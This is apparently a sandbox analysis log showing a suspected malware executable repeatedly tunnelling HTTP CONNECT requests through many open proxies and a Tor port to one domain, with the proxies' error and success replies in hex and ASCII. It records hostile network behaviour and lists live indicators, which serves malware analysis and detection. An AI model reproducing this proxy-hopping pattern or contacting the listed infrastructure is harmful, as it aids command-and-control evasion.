                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.161814928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.489643097 CET309INHTTP/1.1 502 Bad Gateway
                                                                                                      Server: nginx/1.24.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1275192.168.2.4531628.130.39.15533896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.183495998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.178333998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.179341078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.365901947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:50.381227970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1276192.168.2.45369485.14.8.22680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.202373028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.408124924 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1277192.168.2.45370037.18.73.6055666812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.206084967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.409250975 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                      Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1278192.168.2.45369762.33.53.24831286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.214683056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:52.356216908 CET536INHTTP/1.1 503 Service Unavailable
                                                                                                      Server: squid/3.5.27
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:52 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 3725
                                                                                                      X-Squid-Error: ERR_DNS_FAIL 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1279192.168.2.453701196.20.125.12980836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.214718103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1280192.168.2.453666210.211.113.36806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.214998007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1281192.168.2.452794208.109.14.4972186812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.222656012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.365694046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1282192.168.2.45366927.75.149.16910806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.223135948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1283192.168.2.453723194.146.110.22810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.223172903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1284192.168.2.45320727.147.140.5080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.227466106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.292490005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.064713955 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1285192.168.2.453140167.172.91.4731286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.227466106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.558543921 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1286192.168.2.45371137.46.241.247806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.235169888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1287192.168.2.453594222.174.178.12249996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.253851891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.129601955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.333512068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.586186886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.147159100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.647082090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1288192.168.2.453637171.244.140.160175256812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.253904104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.129618883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.219419956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1289192.168.2.453735176.98.81.8580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.254252911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1290192.168.2.453610178.128.82.105178026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.254661083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.178169012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1291192.168.2.453768185.162.230.201806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.274492025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.361788988 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1292192.168.2.45325779.110.201.23580816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.285762072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1293192.168.2.452123103.230.126.123464976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.286500931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1294192.168.2.45375351.75.122.102255226812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.287163019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1295192.168.2.452823103.153.187.19831286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.290745020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1296192.168.2.45370558.75.126.23541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.308716059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1297192.168.2.45375647.179.5.810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.309767962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1298192.168.2.453682222.243.201.15399926812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.310100079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.875525951 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1299192.168.2.453553117.160.250.13388996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.313726902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.815222979 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1300192.168.2.453782162.159.247.92806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.323545933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.411513090 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1301192.168.2.453245202.12.80.11836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.338285923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.365849018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.366086006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.365998030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:50.381225109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
